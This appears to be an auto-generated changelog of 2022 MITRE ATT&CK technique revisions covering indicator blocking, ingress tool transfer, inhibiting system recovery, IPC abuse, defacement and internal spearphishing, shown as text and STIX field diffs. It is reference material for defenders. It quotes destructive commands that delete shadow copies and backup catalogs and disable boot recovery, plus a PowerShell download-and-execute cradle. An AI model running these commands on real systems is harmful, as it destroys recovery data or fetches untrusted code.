x_mitre_version2.02.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesImage: Image Creation

[T1562.006] Impair Defenses: Indicator Blocking

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1An adversary may attempt to block indicators or events typict1An adversary may attempt to block indicators or events typic
>ally captured by sensors from being gathered and analyzed. T>ally captured by sensors from being gathered and analyzed. T
>his could include maliciously redirecting (Citation: Microso>his could include maliciously redirecting (Citation: Microso
>ft Lamin Sept 2017) or even disabling host-based sensors, su>ft Lamin Sept 2017) or even disabling host-based sensors, su
>ch as Event Tracing for Windows (ETW),(Citation: Microsoft A>ch as Event Tracing for Windows (ETW),(Citation: Microsoft A
>bout Event Tracing 2018) by tampering settings that control >bout Event Tracing 2018) by tampering settings that control 
>the collection and flow of event telemetry. (Citation: Mediu>the collection and flow of event telemetry. (Citation: Mediu
>m Event Tracing Tampering 2018) These settings may be stored>m Event Tracing Tampering 2018) These settings may be stored
> on the system in configuration files and/or in the Registry> on the system in configuration files and/or in the Registry
> as well as being accessible via administrative utilities su> as well as being accessible via administrative utilities su
>ch as [PowerShell](https://attack.mitre.org/techniques/T1059>ch as [PowerShell](https://attack.mitre.org/techniques/T1059
>/001) or [Windows Management Instrumentation](https://attack>/001) or [Windows Management Instrumentation](https://attack
>.mitre.org/techniques/T1047).  ETW interruption can be achie>.mitre.org/techniques/T1047).  ETW interruption can be achie
>ved multiple ways, however most directly by defining conditi>ved multiple ways, however most directly by defining conditi
>ons using the [PowerShell](https://attack.mitre.org/techniqu>ons using the [PowerShell](https://attack.mitre.org/techniqu
>es/T1059/001) <code>Set-EtwTraceProvider</code> cmdlet or by>es/T1059/001) <code>Set-EtwTraceProvider</code> cmdlet or by
> interfacing directly with the Registry to make alterations.> interfacing directly with the Registry to make alterations.
>  In the case of network-based reporting of indicators, an a>  In the case of network-based reporting of indicators, an a
>dversary may block traffic associated with reporting to prev>dversary may block traffic associated with reporting to prev
>ent central analysis. This may be accomplished by many means>ent central analysis. This may be accomplished by many means
>, such as stopping a local process responsible for forwardin>, such as stopping a local process responsible for forwardin
>g telemetry and/or creating a host-based firewall rule to bl>g telemetry and/or creating a host-based firewall rule to bl
>ock traffic to specific hosts responsible for aggregating ev>ock traffic to specific hosts responsible for aggregating ev
>ents, such as security information and event management (SIE>ents, such as security information and event management (SIE
>M) products. >M) products.  In Linux environments, adversaries may disable
 > or reconfigure log processing tools such as syslog or nxlog
 > to inhibit detection and monitoring capabilities to facilit
 >ate follow on behaviors (Citation: LemonDuck).
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesManoj Ahuje. (2022, April 21). LemonDuck Targets Docker for Cryptomining Operations. Retrieved June 30, 2022.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-571
values_changed
STIX FieldOld valueNew Value
modified2021-01-13 15:56:04.897000+00:002022-06-30 16:44:16.962000+00:00
descriptionAn adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations. In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products. An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations. In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products. In Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors (Citation: LemonDuck).
external_references[1]['source_name']capecLemonDuck
external_references[1]['url']https://capec.mitre.org/data/definitions/571.htmlhttps://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/
x_mitre_data_sources[0]Windows Registry: Windows Registry Key ModificationCommand: Command Execution
x_mitre_data_sources[2]Command: Command ExecutionWindows Registry: Windows Registry Key Modification
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/571.html', 'external_id': 'CAPEC-571'}

[T1027.005] Obfuscated Files or Information: Indicator Removal from Tools

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_data_sources['Application Log: Application Log Content']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-29 21:03:09.766000+00:002022-04-28 16:07:48.062000+00:00
x_mitre_version1.01.1

[T1105] Ingress Tool Transfer

Current version: 2.1

Version changed from: 2.0 → 2.1


Old Description
New Description
t1Adversaries may transfer tools or other files from an externt1Adversaries may transfer tools or other files from an extern
>al system into a compromised environment. Files may be copie>al system into a compromised environment. Tools or files may
>d from an external adversary controlled system through the c> be copied from an external adversary-controlled system to t
>ommand and control channel to bring tools into the victim ne>he victim network through the command and control channel or
>twork or through alternate protocols with another tool such > through alternate protocols such as [ftp](https://attack.mi
>as FTP. Files can also be copied over on Mac and Linux with >tre.org/software/S0095). Once present, adversaries may also 
>native tools like scp, rsync, and sftp.>transfer/spread tools between victim devices within a compro
 >mised environment (i.e. [Lateral Tool Transfer](https://atta
 >ck.mitre.org/techniques/T1570)).   Files can also be transfe
 >rred using various [Web Service](https://attack.mitre.org/te
 >chniques/T1102)s as well as native or otherwise present tool
 >s on the victim system.(Citation: PTSecurity Cobalt Dec 2016
 >)  On Windows, adversaries may use various utilities to down
 >load tools, such as `copy`, `finger`, and [PowerShell](https
 >://attack.mitre.org/techniques/T1059/001) commands such as <
 >code>IEX(New-Object Net.WebClient).downloadString()</code> a
 >nd <code>Invoke-WebRequest</code>. On Linux and macOS system
 >s, a variety of utilities also exist, such as `curl`, `scp`,
 > `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1
 >105_lolbas)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['John Page (aka hyp3rlinx), ApparitionSec']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2020-03-20 15:42:48.595000+00:002022-05-20 17:38:35.985000+00:00
descriptionAdversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)
x_mitre_data_sources[0]Network Traffic: Network Traffic FlowNetwork Traffic: Network Traffic Content
x_mitre_data_sources[1]Network Traffic: Network Connection CreationFile: File Creation
x_mitre_data_sources[2]Network Traffic: Network Traffic ContentNetwork Traffic: Network Traffic Flow
x_mitre_data_sources[3]File: File CreationNetwork Traffic: Network Connection Creation
x_mitre_detectionMonitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)Monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as [ftp](https://attack.mitre.org/software/S0095), that does not normally occur may also be suspicious. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Specifically, for the finger utility on Windows and Linux systems, monitor command line or terminal execution for the finger command. Monitor network activity for TCP port 79, which is used by the finger utility, and Windows netsh interface portproxy modifications to well-known ports such as 80 and 443. Furthermore, monitor file system for the download/creation and execution of suspicious files, which may indicate adversary-downloaded payloads. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)
x_mitre_version2.02.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 't1105_lolbas', 'description': 'LOLBAS. (n.d.). LOLBAS Mapped to T1105. Retrieved March 11, 2022.', 'url': 'https://lolbas-project.github.io/#t1105'}
external_references{'source_name': 'PTSecurity Cobalt Dec 2016', 'description': 'Positive Technologies. (2016, December 16). Cobalt Snatch. Retrieved October 9, 2018.', 'url': 'https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf'}

[T1490] Inhibit System Recovery

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may delete or remove built-in operating system dt1Adversaries may delete or remove built-in operating system d
>ata and turn off services designed to aid in the recovery of>ata and turn off services designed to aid in the recovery of
> a corrupted system to prevent recovery.(Citation: Talos Oly> a corrupted system to prevent recovery.(Citation: Talos Oly
>mpic Destroyer 2018)(Citation: FireEye WannaCry 2017) Operat>mpic Destroyer 2018)(Citation: FireEye WannaCry 2017) This m
>ing systems may contain features that can help fix corrupted>ay deny access to available backups and recovery options.  O
> systems, such as a backup catalog, volume shadow copies, an>perating systems may contain features that can help fix corr
>d automatic repair features. Adversaries may disable or dele>upted systems, such as a backup catalog, volume shadow copie
>te system recovery features to augment the effects of [Data >s, and automatic repair features. Adversaries may disable or
>Destruction](https://attack.mitre.org/techniques/T1485) and > delete system recovery features to augment the effects of [
>[Data Encrypted for Impact](https://attack.mitre.org/techniq>Data Destruction](https://attack.mitre.org/techniques/T1485)
>ues/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation> and [Data Encrypted for Impact](https://attack.mitre.org/te
>: FireEye WannaCry 2017)  A number of native Windows utiliti>chniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Cit
>es have been used by adversaries to disable or delete system>ation: FireEye WannaCry 2017)  A number of native Windows ut
> recovery features:  * <code>vssadmin.exe</code> can be used>ilities have been used by adversaries to disable or delete s
> to delete all volume shadow copies on a system - <code>vssa>ystem recovery features:  * <code>vssadmin.exe</code> can be
>dmin.exe delete shadows /all /quiet</code> * [Windows Manage> used to delete all volume shadow copies on a system - <code
>ment Instrumentation](https://attack.mitre.org/techniques/T1>>vssadmin.exe delete shadows /all /quiet</code> * [Windows M
>047) can be used to delete volume shadow copies - <code>wmic>anagement Instrumentation](https://attack.mitre.org/techniqu
> shadowcopy delete</code> * <code>wbadmin.exe</code> can be >es/T1047) can be used to delete volume shadow copies - <code
>used to delete the Windows Backup Catalog - <code>wbadmin.ex>>wmic shadowcopy delete</code> * <code>wbadmin.exe</code> ca
>e delete catalog -quiet</code> * <code>bcdedit.exe</code> ca>n be used to delete the Windows Backup Catalog - <code>wbadm
>n be used to disable automatic Windows recovery features by >in.exe delete catalog -quiet</code> * <code>bcdedit.exe</cod
>modifying boot configuration data - <code>bcdedit.exe /set {>e> can be used to disable automatic Windows recovery feature
>default} bootstatuspolicy ignoreallfailures & bcdedit /set {>s by modifying boot configuration data - <code>bcdedit.exe /
>default} recoveryenabled no</code>>set {default} bootstatuspolicy ignoreallfailures & bcdedit /
 >set {default} recoveryenabled no</code>
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['Administrator', 'root', 'SYSTEM', 'User']
values_changed
STIX FieldOld valueNew Value
modified2020-07-14 19:33:52.512000+00:002022-04-19 23:26:59.186000+00:00
descriptionAdversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) A number of native Windows utilities have been used by adversaries to disable or delete system recovery features: * vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet * [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete * wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet * bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled noAdversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options. Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) A number of native Windows utilities have been used by adversaries to disable or delete system recovery features: * vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet * [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete * wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet * bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
external_references[1]['source_name']Talos Olympic Destroyer 2018FireEye WannaCry 2017
external_references[1]['description']Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019.Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.
external_references[1]['url']https://blog.talosintelligence.com/2018/02/olympic-destroyer.htmlhttps://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html
external_references[2]['source_name']FireEye WannaCry 2017Talos Olympic Destroyer 2018
external_references[2]['description']Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019.
external_references[2]['url']https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.htmlhttps://blog.talosintelligence.com/2018/02/olympic-destroyer.html
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile: File Deletion
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile: File Deletion

[T1559] Inter-Process Communication

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may abuse inter-process communication (IPC) mecht1Adversaries may abuse inter-process communication (IPC) mech
>anisms for local code or command execution. IPC is typically>anisms for local code or command execution. IPC is typically
> used by processes to share data, communicate with each othe> used by processes to share data, communicate with each othe
>r, or synchronize execution. IPC is also commonly used to av>r, or synchronize execution. IPC is also commonly used to av
>oid situations such as deadlocks, which occurs when processe>oid situations such as deadlocks, which occurs when processe
>s are stuck in a cyclic waiting pattern.   Adversaries may a>s are stuck in a cyclic waiting pattern.   Adversaries may a
>buse IPC to execute arbitrary code or commands. IPC mechanis>buse IPC to execute arbitrary code or commands. IPC mechanis
>ms may differ depending on OS, but typically exists in a for>ms may differ depending on OS, but typically exists in a for
>m accessible through programming languages/libraries or nati>m accessible through programming languages/libraries or nati
>ve interfaces such as Windows [Dynamic Data Exchange](https:>ve interfaces such as Windows [Dynamic Data Exchange](https:
>//attack.mitre.org/techniques/T1559/002) or [Component Objec>//attack.mitre.org/techniques/T1559/002) or [Component Objec
>t Model](https://attack.mitre.org/techniques/T1559/001). Hig>t Model](https://attack.mitre.org/techniques/T1559/001). Lin
>her level execution mediums, such as those of [Command and S>ux environments support several different IPC mechanisms, tw
>cripting Interpreter](https://attack.mitre.org/techniques/T1>o of which being sockets and pipes.(Citation: Linux IPC) Hig
>059)s, may also leverage underlying IPC mechanisms. Adversar>her level execution mediums, such as those of [Command and S
>ies may also use [Remote Services](https://attack.mitre.org/>cripting Interpreter](https://attack.mitre.org/techniques/T1
>techniques/T1021) such as [Distributed Component Object Mode>059)s, may also leverage underlying IPC mechanisms. Adversar
>l](https://attack.mitre.org/techniques/T1021/003) to facilit>ies may also use [Remote Services](https://attack.mitre.org/
>ate remote IPC execution.(Citation: Fireeye Hunting COM June>techniques/T1021) such as [Distributed Component Object Mode
> 2019)>l](https://attack.mitre.org/techniques/T1021/003) to facilit
 >ate remote IPC execution.(Citation: Fireeye Hunting COM June
 > 2019)

New Mitigations:

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 19:48:30.432000+00:002022-03-11 20:23:23.122000+00:00
descriptionAdversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. Adversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms. Adversaries may also use [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) to facilitate remote IPC execution.(Citation: Fireeye Hunting COM June 2019)Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. Adversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Linux environments support several different IPC mechanisms, two of which being sockets and pipes.(Citation: Linux IPC) Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms. Adversaries may also use [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) to facilitate remote IPC execution.(Citation: Fireeye Hunting COM June 2019)
external_references[1]['source_name']Fireeye Hunting COM June 2019Linux IPC
external_references[1]['description']Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June 10, 2019.N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved March 11, 2022.
external_references[1]['url']https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.htmlhttps://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
x_mitre_data_sources[0]Module: Module LoadProcess: Process Access
x_mitre_data_sources[2]Script: Script ExecutionModule: Module Load
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Fireeye Hunting COM June 2019', 'description': 'Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June 10, 2019.', 'url': 'https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html'}
x_mitre_data_sourcesScript: Script Execution
x_mitre_platformsLinux

[T1491.001] Defacement: Internal Defacement

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1An adversary may deface systems internal to an organization t1An adversary may deface systems internal to an organization 
>in an attempt to intimidate or mislead users. This may take >in an attempt to intimidate or mislead users, thus discredit
>the form of modifications to internal websites, or directly >ing the integrity of the systems. This may take the form of 
>to user systems with the replacement of the desktop wallpape>modifications to internal websites, or directly to user syst
>r.(Citation: Novetta Blockbuster) Disturbing or offensive im>ems with the replacement of the desktop wallpaper.(Citation:
>ages may be used as a part of [Internal Defacement](https://> Novetta Blockbuster) Disturbing or offensive images may be 
>attack.mitre.org/techniques/T1491/001) in order to cause use>used as a part of [Internal Defacement](https://attack.mitre
>r discomfort, or to pressure compliance with accompanying me>.org/techniques/T1491/001) in order to cause user discomfort
>ssages. Since internally defacing systems exposes an adversa>, or to pressure compliance with accompanying messages. Sinc
>ry's presence, it often takes place after other intrusion go>e internally defacing systems exposes an adversary's presenc
>als have been accomplished.(Citation: Novetta Blockbuster De>e, it often takes place after other intrusion goals have bee
>structive Malware)>n accomplished.(Citation: Novetta Blockbuster Destructive Ma
 >lware)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-29 22:57:04.784000+00:002022-07-28 18:55:35.988000+00:00
descriptionAn adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware)An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware)
external_references[1]['source_name']Novetta BlockbusterNovetta Blockbuster Destructive Malware
external_references[1]['description']Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016.
external_references[1]['url']https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdfhttps://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf
external_references[2]['source_name']Novetta Blockbuster Destructive MalwareNovetta Blockbuster
external_references[2]['description']Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016.Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.
external_references[2]['url']https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdfhttps://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
x_mitre_data_sources[0]File: File ModificationFile: File Creation
x_mitre_data_sources[1]File: File CreationNetwork Traffic: Network Traffic Content
x_mitre_data_sources[2]Application Log: Application Log ContentFile: File Modification
x_mitre_data_sources[3]Network Traffic: Network Traffic ContentApplication Log: Application Log Content
x_mitre_version1.01.1

[T1534] Internal Spearphishing

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may use internal spearphishing to gain access tot1Adversaries may use internal spearphishing to gain access to
> additional information or exploit other users within the sa> additional information or exploit other users within the sa
>me organization after they already have access to accounts o>me organization after they already have access to accounts o
>r systems within the environment. Internal spearphishing is >r systems within the environment. Internal spearphishing is 
>multi-staged attack where an email account is owned either b>multi-staged campaign where an email account is owned either
>y controlling the user's device with previously installed ma> by controlling the user's device with previously installed 
>lware or by compromising the account credentials of the user>malware or by compromising the account credentials of the us
>. Adversaries attempt to take advantage of a trusted interna>er. Adversaries attempt to take advantage of a trusted inter
>l account to increase the likelihood of tricking the target >nal account to increase the likelihood of tricking the targe
>into falling for the phish attempt.(Citation: Trend Micro Wh>t into falling for the phish attempt.(Citation: Trend Micro 
>en Phishing Starts from the Inside 2017)  Adversaries may le>When Phishing Starts from the Inside 2017)  Adversaries may 
>verage [Spearphishing Attachment](https://attack.mitre.org/t>leverage [Spearphishing Attachment](https://attack.mitre.org
>echniques/T1566/001) or [Spearphishing Link](https://attack.>/techniques/T1566/001) or [Spearphishing Link](https://attac
>mitre.org/techniques/T1566/002) as part of internal spearphi>k.mitre.org/techniques/T1566/002) as part of internal spearp
>shing to deliver a payload or redirect to an external site t>hishing to deliver a payload or redirect to an external site
>o capture credentials through [Input Capture](https://attack> to capture credentials through [Input Capture](https://atta
>.mitre.org/techniques/T1056) on sites that mimic email login>ck.mitre.org/techniques/T1056) on sites that mimic email log
> interfaces.  There have been notable incidents where intern>in interfaces.  There have been notable incidents where inte
>al spearphishing has been used. The Eye Pyramid campaign use>rnal spearphishing has been used. The Eye Pyramid campaign u
>d phishing emails with malicious attachments for lateral mov>sed phishing emails with malicious attachments for lateral m
>ement between victims, compromising nearly 18,000 email acco>ovement between victims, compromising nearly 18,000 email ac
>unts in the process.(Citation: Trend Micro When Phishing Sta>counts in the process.(Citation: Trend Micro When Phishing S
>rts from the Inside 2017) The Syrian Electronic Army (SEA) c>tarts from the Inside 2017) The Syrian Electronic Army (SEA)
>ompromised email accounts at the Financial Times (FT) to ste> compromised email accounts at the Financial Times (FT) to s
>al additional account credentials. Once FT learned of the at>teal additional account credentials. Once FT learned of the 
>tack and began warning employees of the threat, the SEA sent>campaign and began warning employees of the threat, the SEA 
> phishing emails mimicking the Financial Times IT department>sent phishing emails mimicking the Financial Times IT depart
> and were able to compromise even more users.(Citation: THE >ment and were able to compromise even more users.(Citation: 
>FINANCIAL TIMES LTD 2019.)>THE FINANCIAL TIMES LTD 2019.)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-14 14:32:14.273000+00:002022-03-08 21:29:30.249000+00:00
